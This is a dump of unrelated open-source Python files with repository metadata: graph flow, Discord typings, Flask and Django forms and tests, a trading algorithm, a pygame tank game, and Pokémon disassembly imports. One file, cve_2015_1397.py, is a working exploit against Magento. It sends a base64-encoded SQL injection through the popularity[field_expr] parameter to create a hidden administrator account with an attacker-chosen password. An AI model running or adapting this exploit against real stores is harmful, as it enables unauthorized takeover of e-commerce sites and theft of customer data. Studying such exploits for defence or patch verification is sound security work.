class Meta:
model=Receipt
exclude= () | UTF-8 | Python | false | false | 317 | py | 9 | form.py | 4 | 0.753943 | 0.750789 | 0 | 11 | 27.909091 | 126 |
parmarjh/graph-analytics-course | 8,315,056,726,242 | 77f5b9fd6ef6bbc943dda37c5369a3f6182a39b7 | bfccc163836369bb5e4b8a180ae0bda14bbdf6c2 | /lecture-4/flows/flows.py | c086e520ad56c4a27c0f948b3c5b162c2b267407 | [] | no_license | https://github.com/parmarjh/graph-analytics-course | dcec11eeb1d197b65a22f4e5cbadf509682d3912 | 0f04b0b743817f2f465e861938d055e644eefaeb | refs/heads/master | 2023-08-15T15:59:49.099725 | 2021-09-28T03:54:52 | 2021-09-28T03:54:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import networkx as nx
import matplotlib.pyplot as plt
import pprint as pp
G = nx.read_edgelist('./graph-flow.txt', nodetype=str,
data=(('capacity', int),), create_using=nx.DiGraph())
pos = nx.spring_layout(G)
nx.draw(G, pos, with_labels=True, node_color="#f86e00")
flow = nx.maximum_flow(G, _s="s", _t="t")
flow_value = nx.maximum_flow_value(G, _s="s", _t="t")
pp.pprint(flow)
print("Maximum flow value is: " + str(flow_value))
plt.show()
| UTF-8 | Python | false | false | 467 | py | 87 | flows.py | 51 | 0.640257 | 0.631692 | 0 | 19 | 23.578947 | 74 |
Pycord-Development/pycord | 16,363,825,413,142 | 709a8ca05db1f5d451dc6888781042788a38536b | 681d42ab5a237b580436eab6271768aefee3048e | /discord/types/__init__.py | 79e1e68bb7fbb6d1e91c2b0a2303a2f13c701158 | [
"MIT"
] | permissive | https://github.com/Pycord-Development/pycord | d2555f7e08f0eea29653ee1e4f6fb7847a859500 | a3bd2a04fbd7ac0cec5a119cc9b360965aaaab8e | refs/heads/master | 2023-08-29T07:10:24.810548 | 2023-08-29T01:37:00 | 2023-08-29T01:37:00 | 400,837,389 | 2,960 | 941 | MIT | false | 2023-09-11T20:15:37 | 2021-08-28T16:18:37 | 2023-09-11T14:24:43 | 2023-09-11T20:15:36 | 15,833 | 2,540 | 433 | 93 | Python | false | false | """
discord.types
~~~~~~~~~~~~~~
Typings for the Discord API
:copyright: (c) 2015-2021 Rapptz & (c) 2021-present Pycord Development
:license: MIT, see LICENSE for more details.
"""
| UTF-8 | Python | false | false | 183 | py | 126 | __init__.py | 79 | 0.666667 | 0.601093 | 0 | 9 | 19.333333 | 70 |
mygit2014/vulnexipy | 1,889,785,645,290 | c3685fe893985e37b544d2340587e1a515291041 | 5508a6634049bc83627f65337c1070c8f4c6d2e0 | /cve_2015_1397.py | f7b9742bd9b0324875c13ebb2095dca1ab1425c1 | [] | no_license | https://github.com/mygit2014/vulnexipy | 6163e5e77724a4be5babf8afd76f4be5143c5845 | c7dc0d4dabf48893baf0dc5c7b614cc62b5016e8 | refs/heads/master | 2023-04-21T10:45:56.438431 | 2021-05-10T10:38:26 | 2021-05-10T10:38:26 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import requests
import sys
import base64
import argparse
from log_colors import *
# SQL injection vulnerability in the getCsvFile
# function in the Mage_Adminhtml_Block_Widget_Grid
# class in Magento Community Edition (CE) 1.9.1.0
# and Enterprise Edition (EE) 1.14.1.0
# allows remote administrators to execute arbitrary
# SQL commands via the popularity[field_expr]
# parameter when the popularity[from] or popularity[to] parameter is set.
class CVE2015_1397:
def __init__(self, url, user, pswd):
print (LogColors.BLUE + "victim: " + url + "..." + LogColors.ENDC)
self.url = url
self.user, self.pswd = user, pswd
self.session = requests.Session()
def exploit(self):
print (LogColors.BLUE + "exploitation..." + LogColors.ENDC)
q = "SET @SALT = 'rp';"
q += "SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{passwd}')".format(passwd = self.pswd)
q += " ), CONCAT(':', @SALT ));"
q += "SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;"
q += "INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,"
q += "`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,"
q += "`rp_token_created_at`) "
q += "VALUES ('Firstname','Lastname','hacked@hack.com','{user}',".format(user = self.user)
q += "@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());"
q += "INSERT INTO `admin_role` (parent_id,tree_level,sort_order,"
q += "role_type,user_id,role_name) "
q += "VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username ="
q = q.replace("\n", "")
q += " '{user}'),'Firstname');".format(user = self.user)
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(q)
print (LogColors.YELLOW + pfilter + "..." + LogColors.ENDC)
data = {
"___directive" : "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
"filter" : base64.b64encode(pfilter.encode()).decode(),
"forwarded" : 1
}
r = self.session.post(
self.url.rstrip("/") + "/index.php/admin/Cms_Wysiwyg/directive/index/",
data = data
)
if r.ok:
print (LogColors.YELLOW + "auth: " + self.user + ":" + self.pswd + LogColors.ENDC)
print (LogColors.GREEN + "successfully send payload. hacked :)" + LogColors.ENDC)
else:
print (LogColors.RED + "sending payload failed :(" + LogColors.ENDC)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url', required = True, help = "target url")
parser.add_argument('-user','--username', required = True, help = "auth username")
parser.add_argument('-pswd','--password', required = True, help = "auth password")
args = vars(parser.parse_args())
url = args["url"]
user, pswd = args["username"], args["password"]
cve = CVE2015_1397(url, user, pswd)
cve.exploit()
| UTF-8 | Python | false | false | 3,042 | py | 87 | cve_2015_1397.py | 83 | 0.60092 | 0.583498 | 0 | 64 | 46.515625 | 114 |
georgecai904/directconnect | 2,173,253,453,747 | f4ab26c97aa5f8e894145f10f9bb97de079ffc3d | d7d8a8b8ba443538db5465f21e1f0771c5f77d2e | /core/tests/test_sign_up.py | 8e51b7f5f008ca331d55dd4df1b7e67bba7bffa1 | [] | no_license | https://github.com/georgecai904/directconnect | cbe8462c166394d47d830633b2f460c4ec1b552b | 30c59ea4beda330cca313e9274261cc2e8bc5cde | refs/heads/master | 2021-04-19T00:57:34.798017 | 2017-07-12T14:40:20 | 2017-07-12T14:40:20 | 94,593,817 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.test import TestCase
from core.forms import NewUserForm
from django.contrib.auth.models import User
class AuthTest(TestCase):
def test_sign_up(self):
data = {
"username": "georgecai904",
"password": "testpassword",
"email": "mail@georgecai.com"
}
NewUserForm(data).save()
self.assertEqual(User.objects.count(), 1)
| UTF-8 | Python | false | false | 400 | py | 55 | test_sign_up.py | 35 | 0.6225 | 0.6125 | 0 | 14 | 27.571429 | 49 |
AboveColin/Webtechnologie_Project | 2,130,303,791,987 | 79cbbdec93ca9c1682af74834effe370c4cd51ff | 27aeefb14007ba389d937dfbe79eae09226db056 | /stage/forms.py | e3e40f452d0084470868a0f50b1e75f2d0e4e3c6 | [] | no_license | https://github.com/AboveColin/Webtechnologie_Project | bf97041c6d397e9acd19d627c05c271cf3766e48 | ef1462c1243aa212438c77ad04b3479daa18b230 | refs/heads/main | 2023-07-18T23:11:49.809803 | 2021-09-20T09:02:16 | 2021-09-20T09:02:16 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, SelectField
from wtforms.validators import data_required, Email, EqualTo
from wtforms import ValidationError
from stage.models import User, Begeleider
# A form where a user can login using a submit button, his username and password.
class Loginform(FlaskForm):
username = StringField("Gebruikersnaam", validators=[data_required()])
password = PasswordField("Wachtwoord", validators=[data_required()])
submit = SubmitField("Inloggen")
# A form where you can register as a user
class Registratie(FlaskForm):
email = StringField("E-mailadres", validators=[data_required(), Email()])
voornaam = StringField("Voornaam", validators=[data_required()])
achternaam = StringField("Achternaam", validators=[data_required()])
username = StringField("Gebruikersnaam", validators=[data_required()])
password = PasswordField("Wachtwoord", validators=[data_required(), EqualTo("pass_confirm", message="Wachtwoorden komen niet overeen")])
pass_confirm = PasswordField("Bevestig wachtwoord", validators=[data_required()])
submit = SubmitField("Registreer")
| UTF-8 | Python | false | false | 1,201 | py | 19 | forms.py | 7 | 0.741049 | 0.741049 | 0 | 22 | 52.409091 | 140 |
decayboy/Lean.Algorithms | 11,106,785,430,372 | a1b646f2cd56db07f4df24173cdfed201097f7b6 | 3aa19b823a911968725605dd6d2019b92e96a477 | /Python/GoogleTrends.py | c3e376b65ae40d03381f8ee6168b701dfb4db63e | [
"Apache-2.0"
] | permissive | https://github.com/decayboy/Lean.Algorithms | 884c08dd1a23a4bebc75df1aa7bf298c85248126 | 0109addf768fea511ffb05ef164653797d097245 | refs/heads/master | 2020-04-15T02:54:34.925488 | 2019-01-20T06:25:29 | 2019-01-20T06:25:29 | 164,328,522 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pandas as pd
import numpy as np
from datetime import timedelta
### <summary>
### Utilizes the monthly Google trends search term "debt" to anticipate potential price movements.
### Contrast other search terms and assets to produce interesting results.
### </summary>
class BasicTemplateAlgorithm(QCAlgorithm):
'''Basic template algorithm simply initializes the date range and cash'''
def Initialize(self):
'''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''
self.SetBrokerageModel(BrokerageName.InteractiveBrokersBrokerage)
self.SetBenchmark("SPY")
self.SetStartDate(2009,12, 1) #Set Start Date
self.SetEndDate(2018,8,18) #Set End Date
self.SetCash(100000) #Set Strategy Cash
self.equity = ['SPY', 'IEF']
self.months = {}
# Find more symbols here: http://quantconnect.com/data
self.AddEquity(self.equity[0], Resolution.Hour)
self.AddEquity(self.equity[1], Resolution.Hour)
self.google_trends = pd.DataFrame(columns=['Week', 'interest'])
self.file = self.Download("https://www.dropbox.com/s/lzah401ulb8cdba/debtMonthly.csv?dl=1")
self.file = self.file.split("\n")
i = 0
for row in self.file[1:]:
one_row = row.split(",")
self.google_trends.loc[i] = one_row
i += 1
self.google_trends["MA3"] = self.google_trends.interest.rolling(3).mean()
self.google_trends["MA18"] = self.google_trends.interest.rolling(18).mean()
self.google_trends["Signal"] = self.google_trends["MA3"].astype('float') - self.google_trends["MA18"].astype('float')
self.google_trends["Signal"] = self.google_trends["Signal"].shift(1)
def OnData(self, data):
'''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.
Arguments:
data: Slice object keyed by symbol containing the stock data
'''
date_today = self.Time.date()
date_today = date_today.strftime(format='%Y-%m-%d')
date_today = date_today[0:7]
signal = self.google_trends.loc[self.google_trends.Week == date_today,"Signal"].iloc[0]
try:
invested = self.months[date_today]
except:
invested = "No"
if self.Time.hour == 15 and invested == "No":
if self.Portfolio[self.equity[0]].Quantity > 0 and signal > 0:
self.Liquidate(self.equity[0])
if self.Portfolio[self.equity[1]].Quantity > 0 and signal < 0:
self.Liquidate(self.equity[1])
if signal < 0 and self.Portfolio[self.equity[0]].Quantity == 0:
self.SetHoldings(self.equity[0], 1)
self.months[date_today] = "Yes"
return
if signal > 0 and self.Portfolio[self.equity[1]].Quantity == 0:
self.SetHoldings(self.equity[1], 1)
self.months[date_today] = "Yes"
return
| UTF-8 | Python | false | false | 3,141 | py | 2 | GoogleTrends.py | 1 | 0.610315 | 0.590258 | 0 | 68 | 45.191176 | 151 |
marcenavuc/battle_city | 13,700,945,710,554 | 9ef0f7027bed2c91dfbe9fe9bddfd8a3b6cc9c14 | 17dfa7fc4e5a37fb2ef8d67126c2a633a1210a9e | /battle_city/game_objects/tanks.py | f0f21e9c414cad894fc04b86397efefb5d8e3931 | [] | no_license | https://github.com/marcenavuc/battle_city | c404c528ebb3f273f1aa2d4ac91acf8891fb52da | 75c164d73b6d060fbb4a052fad41fcfafc5687f1 | refs/heads/main | 2023-02-10T00:31:57.629343 | 2020-12-30T15:38:18 | 2020-12-30T15:38:18 | 305,317,156 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import logging
import random
import time
import pygame
from battle_city.config import RESPAWN_TIME
from battle_city.game_objects import Missile
from battle_city.game_objects.game_object import Directions, Movable,\
GameObject
logger = logging.getLogger(__name__)
class Tank(Movable):
image = "media/images/tank.png"
def __init__(self, position, direction=Directions.UP, *args, **kwars):
super().__init__(position, *args, **kwars)
self.velocity = 5
self.health = 1
self.speed = 5
self.is_shot = False
self.period_duration = RESPAWN_TIME / 8
self.time_of_creation = time.time()
def set_position(self, position: pygame.rect.Rect, level) \
-> pygame.rect.Rect:
if self.is_collidelist(position, level.floor) >= 0:
self.speed = self.velocity / 2
else:
self.speed = self.velocity
if (
self.in_borders(position, level)
and self.is_collidelist(position, level.walls) < 0
and self.is_collidelist(position, level.blocks) < 0
):
return position
return self.rect
def shot(self, level):
missile_position = self.move(self.direction, speed=25)
if self.is_shot and missile_position.colliderect(missile_position):
missile = Missile(missile_position, self.direction)
level.missiles.append(missile)
class EnemyTank(Tank):
image = "media/images/tank.png"
def __init__(self, position, *args, **kwars):
super().__init__(position, *args, **kwars)
def update(self, event: pygame.event, level, *args):
if abs(self.time_of_creation - time.time()) < self.period_duration:
self.random_walk(level)
elif abs(self.time_of_creation - time.time()) < 2*self.period_duration:
self.move_to_obj(level.player, level)
else:
self.move_to_obj(level.command_center, level)
def random_walk(self, level):
rand_number = random.randint(1, 1000)
direction = self.direction
if rand_number < 100:
direction = Directions.random_direction()
if rand_number < 50:
self.shot(level)
new_position = self.move(direction)
self.rect = self.set_position(new_position, level)
def move_to_obj(self, obj: GameObject, level):
direction = self.direction
if self.rect.y + self.speed < obj.rect.y:
direction = Directions.DOWN
elif self.rect.y - self.speed > obj.rect.y:
direction = Directions.UP
elif self.rect.x - self.speed < obj.rect.x:
direction = Directions.RIGHT
elif self.rect.x + self.speed > obj.rect.x:
direction = Directions.LEFT
new_position = self.move(direction)
print(self.rect, new_position)
new_rect = self.set_position(new_position, level)
if self.rect == new_rect:
logger.debug("Didn't found the way")
self.period_duration *= 2
else:
self.rect = new_rect
class SpeedTank(EnemyTank):
image = "media/images/tank.png"
def __init__(self, position, *args, **kwars):
super().__init__(position, *args, **kwars)
self.speed = 10
class HeavyTank(EnemyTank):
image = "media/images/heavy_tank.png"
def __init__(self, position, *args, **kwars):
super().__init__(position, *args, **kwars)
self.speed = 2
self.health = 3
class RushTank(EnemyTank):
image = "media/images/rush_tank.png"
def __init__(self, position, *args, **kwars):
super().__init__(position, *args, **kwars)
self.speed = 5
def update(self, event: pygame.event, level, *args):
self.move_to_obj(level.command_center, level)
| UTF-8 | Python | false | false | 3,806 | py | 35 | tanks.py | 26 | 0.602995 | 0.595901 | 0 | 119 | 30.983193 | 79 |
JMHOO/planet-insight | 4,629,974,775,692 | 5e98067d0ebf3f4aa3ecd7ba12eb83f53db5a6a0 | 79659f16658fadd105295497c84193b8017eb68a | /package/insight/agent.py | 5042c0db4bd7853f0e484860558230ad6706fb34 | [] | no_license | https://github.com/JMHOO/planet-insight | 13a0652849f1c2b08d8a9b7968c24a4085b04ff8 | d2a40459b3d2bdd5bfedb8f3707e19bc5e2e7678 | refs/heads/master | 2021-09-11T00:54:29.128438 | 2018-04-05T05:09:32 | 2018-04-05T05:09:32 | 103,308,427 | 3 | 2 | null | false | 2018-04-05T05:09:33 | 2017-09-12T18:46:05 | 2018-01-12T01:43:54 | 2018-04-05T05:09:33 | 436 | 2 | 1 | 1 | JavaScript | false | null | from .storage import DBJobInstance, DBWorker
import docker
import platform
import threading
from random import randint
from time import sleep
from simple_settings import LazySettings
import os
settings = LazySettings('insight.applications.settings')
class LocalDockerRunner():
def __init__(self, cli, gpu_count, image_name, volumes, commands, environments=None):
self.docker = cli
self.gpu_count = gpu_count
self.image_name = image_name
self.volumes = volumes
self.commands = commands
self.environments = environments
self.containerId = ""
self._t = None
self.volumes = {"nvidia_driver_384.98": "/usr/local/nvidia"}
self._reportor = DBWorker()
def start(self):
self._t = threading.Thread(target=self.run_container)
self._t.start()
def is_container_running(self):
for container in self.docker.containers(all=False):
if container['Id'] == self.containerId:
return True
return False
def __del__(self):
if self._t:
self._t.join()
def run_container(self):
commands = ''
if self.commands:
commands = 'bash -c "' + self.commands + '"'
binds = []
for s, d in self.volumes.items():
binds.append(s + ":" + d)
volumes = list(self.volumes.values())
devices = ["/dev/nvidiactl:/dev/nvidiactl", "/dev/nvidia-uvm:/dev/nvidia-uvm"]
for i in range(self.gpu_count):
devices.append("/dev/nvidia{}:/dev/nvidia{}".format(i, i))
host_config = self.docker.create_host_config(devices=devices, binds=binds)
response = self.docker.create_container(
image=self.image_name,
volumes=volumes,
command=commands,
environment=self.environments,
host_config=host_config)
if response['Warnings'] is None:
self.containerId = response['Id']
else:
print(response['Warnings'])
return
self.docker.start(self.containerId)
print('Container {} started, waiting to finish...'.format(self.containerId))
# Keep running until container is exited
while self.is_container_running():
sleep(1)
self._reportor.report(platform.node(), system_info="{}", status='training')
# Remove the container when it is finished
self.docker.remove_container(self.containerId)
print('Container exited')
class AgentService(threading.Thread):
def __init__(self, gpu_count=1):
super().__init__()
self.stoprequest = threading.Event()
self.gpu_count = gpu_count
self.worker_name = platform.node()
def stop(self, timeout=None):
self.stoprequest.set()
super().join(timeout)
def run(self):
print('INFO::Agent service started.')
try:
aws_key = os.environ['AWS_ACCESS_KEY_ID']
aws_access = os.environ['AWS_SECRET_ACCESS_KEY']
aws_region = os.environ['AWS_DEFAULT_REGION']
except KeyError:
print('ERROR::AWS credential not configed, exit.')
return
# docker instance
self._docker = None
try:
if platform.system() is 'Windows':
self._docker = docker.APIClient(base_url='npipe:////./pipe/docker_engine')
else:
self._docker = docker.APIClient(base_url='unix:///var/run/docker.sock')
except:
self._docker = None
if self._docker is None:
print('ERROR::No docker engine installed, abort!')
return
print('INFO::Connected to docker engine.')
self._jobs = DBJobInstance()
self._reportor = DBWorker()
while not self.stoprequest.is_set():
random_sleep = randint(3, 10)
# do job checking
new_job = self._jobs.check_new_job()
if new_job is not None:
print('Got new jog: {}'.format(new_job))
pretrain_weights = '-w ' + new_job['pretrain']
#if pretrain_weights != 'NONE':
# pretrain_weights = '-w ' + pretrain_weights
#else:
# pretrain_weights = ''
monitor_service = settings.MONITOR['HOST'] + settings.MONITOR['PATH']
command = '/home/root/insight/run_worker.sh -i {} -m {} {} -d {} -s {}'.format(
new_job['instance_name'], new_job['model_name'], pretrain_weights, new_job['dataset_name'], monitor_service
)
print(command)
environment = {
'AWS_ACCESS_KEY_ID': aws_key,
'AWS_SECRET_ACCESS_KEY': aws_access,
'AWS_DEFAULT_REGION': aws_region
}
self._reportor.report(platform.node(), system_info="{}", status='preparing')
# do job and waiting
runner = LocalDockerRunner(
self._docker,
self.gpu_count,
settings.DOCKER['IMAGE'] + ':' + settings.DOCKER['VERSION'],
volumes=None,
commands=command,
environments=environment
)
# since we already in a thread, call block function instead of start another thread
runner.run_container()
# sleep random seconds between 3 ~ 10
print('INFO::No job, waiting {} seconds'.format(random_sleep))
self._reportor.report(platform.node(), system_info="{}", status='idle')
sleep(random_sleep)
| UTF-8 | Python | false | false | 5,755 | py | 61 | agent.py | 49 | 0.550304 | 0.548045 | 0 | 167 | 33.45509 | 127 |
Bibek-Bhandari/argument-mining-assignment | 19,430,432,073,296 | 536d6d45526ee94b3f6b9bb8a0c1a847b25af466 | 6329df89021c2adf5f12f44a503bb415db58f9b7 | /argument-mining-assignment/code/evaluation.py | 6a06b7c21569e9cc38f54c4d79aa44788c8d3e7e | [] | no_license | https://github.com/Bibek-Bhandari/argument-mining-assignment | dae14e26863f317f156157a332e9c81f69db727d | 13587b43cde29f3e5d0565b49b831a1fb8ace3c8 | refs/heads/master | 2022-10-17T10:54:56.720217 | 2020-05-29T17:16:11 | 2020-05-29T17:16:11 | 266,842,567 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import argparse
from sklearn.metrics import f1_score
def evaluation(path_to_ground_truth_bio, path_to_pred_bio):
'''
Computing F1-score for each of the major-claim, claim, premises, and non-argumentative classes
'''
gt_bio = [x.split('\t') for x in open(path_to_ground_truth_bio).readlines() if x !='\n']
pred_bio = [x.split('\t') for x in open(path_to_ground_truth_bio).readlines() if x !='\n']
assert len(gt_bio) == len(pred_bio), 'Number of tokens in the prediction file is different than the ground truth.'
#F1-score overall tokens..
_, gt_y = zip(*gt_bio)
_, pred_y = zip(*pred_bio)
overall_f1_score = f1_score(gt_y, pred_y, average='macro')
print('F1-SCORE: ', overall_f1_score )
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Evaluate your approach')
parser.add_argument('--gt_bio_path')
parser.add_argument('--pred_bio_path')
args = parser.parse_args()
evaluation(args.gt_bio_path, args.pred_bio_path)
| UTF-8 | Python | false | false | 1,015 | py | 6 | evaluation.py | 5 | 0.649261 | 0.642365 | 0 | 31 | 31.741935 | 118 |
pandrian75/pastiche | 14,645,838,516,754 | 35149e7df278e3a0dcebb329d51dc33ebd6490b2 | f3fd212093c372ba4da2ef3644eb65bf454616ba | /populate_db.py | 3f4be66a3e394b0739de4abf622aa7a3e1e565b0 | [] | no_license | https://github.com/pandrian75/pastiche | 00ffb57fc5bba97aa190a44f59257b124e18a5fa | 0422dd6fed6f7d5660256be602eade00b0f35d53 | refs/heads/master | 2016-08-09T14:33:17.180641 | 2008-07-31T07:53:16 | 2008-07-31T07:53:16 | 50,779,665 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
import pastiche
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'pastiche.settings'
from datetime import datetime
from dada.models import Item, Event, Link, Location, Note, Tag, Task
from django.contrib.auth.models import User
def empty_table(table):
for o in table.objects.all():
o.delete()
##empty_table(Item)
##empty_table(Node)
#empty_table(Note)
#empty_table(Link)
#empty_table(Location)
#empty_table(Tag)
##empty_table(Task) # TODO: probably need to delete according to hierarchy, recursively
##empty_table(Event) # TODO: same
u1 = User.objects.get(username='andre')
t1 = Task()
t1.title = 'first task'
t1.user = u1
t1.save()
t2 = Task()
t2.user = u1
t2.parent = t1
t2.title = 'second task'
t2.save()
t3 = Task()
t3.user = u1
t3.parent = t1
t3.title = 'third task'
t3.due = datetime.now()
t3.save()
t4 = Task()
t4.user = u1
t4.parent = t2
t4.title = 'fourth task'
t4.done = True
t4.save()
e1 = Event()
e1.title = 'first event'
e1.user = u1
e1.rating = 4
e1.start = datetime.now()
e1.stop = datetime(2008, 10, 31, 12, 34, 56)
e1.save()
e2 = Event()
e2.title = 'second event'
e2.user = u1
e2.rating = 2
e2.start = datetime.now()
e2.stop = datetime(2008, 10, 31, 12, 34, 56)
e2.save()
e3 = Event()
e3.title = 'first subevent'
e3.user = u1
e3.parent = e2
e3.start = datetime.now()
e3.stop = datetime(2008, 9, 18, 12, 34, 56)
e3.save()
e4 = Event()
e4.title = 'second subevent'
e4.user = u1
e4.parent = e2
e4.start = datetime(2008, 9, 18, 12, 34, 56)
e4.stop = datetime(2008, 10, 31, 12, 34, 56)
e4.save()
l1 = Link()
l1.title = 'first link'
l1.user = u1
l1.private = True
l1.url = 'http://pastiche.info'
l1.save()
n1 = Note()
n1.title = 'first note'
n1.user = u1
n1.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n1.owner = l1 # add owner to note
n1.save()
n2 = Note()
n2.title = 'second note'
n2.user = u1
n2.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n2.save()
l2 = Link()
l2.title = 'second link'
l2.user = u1
l2.private = True
l2.url = 'http://pastiche.info'
l2.save()
l2.annotations.add(n2) # add note to owner (after save!)
l3 = Link()
l3.title = 'third link'
l3.user = u1
l3.url = 'http://pastiche.info'
l3.owner = t1
l3.save()
l4 = Link()
l4.title = 'fourth link'
l4.user = u1
l4.url = 'http://pastiche.info'
l4.owner = t1
l4.save()
l5 = Link()
l5.title = 'fifth link'
l5.user = u1
l5.url = 'http://pastiche.info'
l5.save()
n3 = Note()
n3.title = 'third note'
n3.user = u1
n3.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n3.owner = t1
n3.save()
n4 = Note()
n4.title = 'fourth note'
n4.user = u1
n4.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n4.owner = t3
n4.save()
n5 = Note()
n5.title = 'fifth note'
n5.user = u1
n5.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n5.owner = e2
n5.save()
n6 = Note()
n6.title = 'sixth note'
n6.user = u1
n6.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n6.owner = e4
n6.save()
n7 = Note()
n7.title = 'seventh note'
n7.user = u1
n7.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n7.save()
n8 = Note()
n8.title = 'eighth note'
n8.user = u1
n8.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.'
n8.owner = l5
n8.save()
h1 = Item()
h1.user = u1
h1.title = 'Bookmarks'
h1.save()
l6 = Link()
l6.title = 'first bookmark'
l6.user = u1
l6.url = 'http://pastiche.info'
l6.parent = h1
l6.save()
l7 = Link()
l7.title = 'second bookmark'
l7.user = u1
l7.url = 'http://pastiche.info'
l7.parent = h1
l7.save()
h2 = Item()
h2.user = u1
h2.title = 'More Bookmarks'
h2.parent = h1
h2.save()
l8 = Link()
l8.title = 'third bookmark'
l8.user = u1
l8.url = 'http://pastiche.info'
l8.parent = h2
l8.save()
l9 = Link()
l9.title = 'fourth bookmark'
l9.user = u1
l9.url = 'http://pastiche.info'
l9.parent = h2
l9.save()
print 'db populated.'
###
#t = SimpleTask()
#t.title = 'first task'
#t.done = False
#t.save()
#n = SimpleNote()
#n.title = 'first note'
#n.text = "just some text for this note."
#n.owner = t
#n.save()
##t.annotations.add(n)
#n.owner
#n.owner.title
#t.notes
#t.notes.count()
#t.notes.all()[0].title
| UTF-8 | Python | false | false | 4,582 | py | 14 | populate_db.py | 6 | 0.639241 | 0.579005 | 0 | 228 | 18.096491 | 93 |
fran757/tdlog | 2,516,850,876,334 | 21cab59ab42aacf10e899abbcccb6f43b42c65e0 | 477f1c24269b0c6f4a2ae58569bcb2d21b07a2d2 | /test_game.py | 5653216af8cf36705011d864c66c3d66144e4d66 | [] | no_license | https://github.com/fran757/tdlog | 9a9f368ad3fe1e798f3a2770e03f529e5fa7a5b4 | 74f7b2251de916f3dc870aacd7d701e599004c5d | refs/heads/master | 2022-04-06T02:25:18.065547 | 2020-02-04T10:21:20 | 2020-02-04T10:21:20 | 218,588,437 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import unittest
from model import Grid
from control import Game
def fixture_name(name):
"""return appropriate filename"""
return os.getcwd() + "/fixtures/" + name + ".txt"
def build_fixture(name):
"""build game from fixture name"""
return Game(Grid(fixture_name(name)), None)
def extract_fixture(name):
"""extract fixture data"""
data = []
with open(fixture_name(name)) as fixture:
for line in fixture:
data.append(line)
return data
def repr_fixture(name):
"""return repr of fixture"""
with open(fixture_name(name)) as fixture:
return "".join(["".join(line) for line in fixture])
def write_fixture(data):
"""write fixture to tmp file"""
with open(fixture_name("tmp"), "w") as tmp_file:
print(data, file=tmp_file)
def expectation(move, expected):
"""Give fixture comparison result and related error message."""
value = extract_fixture("tmp") == extract_fixture(expected)
message = "Grid is not as expected after {} :\n".format(move) + repr_fixture("tmp")
return value, message
class GlobalTest(unittest.TestCase):
def test_all(self):
"""tests :
moving to empty cell
moving into cell
switching character
turning turnstile
blocked turnstile
pushing crate into hole
falling into hole
"""
self.game = build_fixture("../model/grid")
move = "1vv2^>3>>>"
self.game.process_input(move)
write_fixture(str(self.game.grid))
self.assertTrue(*expectation(move, "global"))
if __name__ == "__main__":
unittest.main()
| UTF-8 | Python | false | false | 1,648 | py | 16 | test_game.py | 15 | 0.621966 | 0.620146 | 0 | 64 | 24.75 | 87 |
kanzure/pokecrystal-demo | 386,547,101,625 | b1a1a3a31aa41d6534dd4c81b67284836e479d71 | 77aef3246236c192850e419eb04c6fae0a7697ba | /extras/tests.py | 61f46d6cb8d6f8f859f6b5682bd2c0dc608efe5e | [] | no_license | https://github.com/kanzure/pokecrystal-demo | ce61540f8d0fff4ddd253d15f9718201ef838b23 | 9ec5b0d12b1b3c0e164cb41cca8442989b3ada66 | refs/heads/master | 2016-09-06T21:34:58.619212 | 2013-05-16T13:58:10 | 2013-05-16T13:58:10 | 9,989,839 | 3 | 2 | null | false | 2013-05-16T13:58:11 | 2013-05-10T20:33:17 | 2013-05-16T13:58:10 | 2013-05-16T13:58:10 | 404 | null | 7 | 5 | Assembly | null | null | # -*- coding: utf-8 -*-
import os
import sys
import inspect
from copy import copy
import hashlib
import random
import json
from interval_map import IntervalMap
from chars import chars, jap_chars
from romstr import (
RomStr,
AsmList,
)
from item_constants import (
item_constants,
find_item_label_by_id,
generate_item_constants,
)
from pointers import (
calculate_bank,
calculate_pointer,
)
from pksv import (
pksv_gs,
pksv_crystal,
)
from labels import (
remove_quoted_text,
line_has_comment_address,
line_has_label,
get_label_from_line,
)
from crystal import (
rom,
load_rom,
rom_until,
direct_load_rom,
parse_script_engine_script_at,
parse_text_engine_script_at,
parse_text_at2,
find_all_text_pointers_in_script_engine_script,
SingleByteParam,
HexByte,
MultiByteParam,
PointerLabelParam,
ItemLabelByte,
DollarSignByte,
DecimalParam,
rom_interval,
map_names,
Label,
scan_for_predefined_labels,
all_labels,
write_all_labels,
parse_map_header_at,
old_parse_map_header_at,
process_00_subcommands,
parse_all_map_headers,
translate_command_byte,
map_name_cleaner,
load_map_group_offsets,
load_asm,
asm,
is_valid_address,
index,
how_many_until,
grouper,
get_pokemon_constant_by_id,
generate_map_constant_labels,
get_map_constant_label_by_id,
get_id_for_map_constant_label,
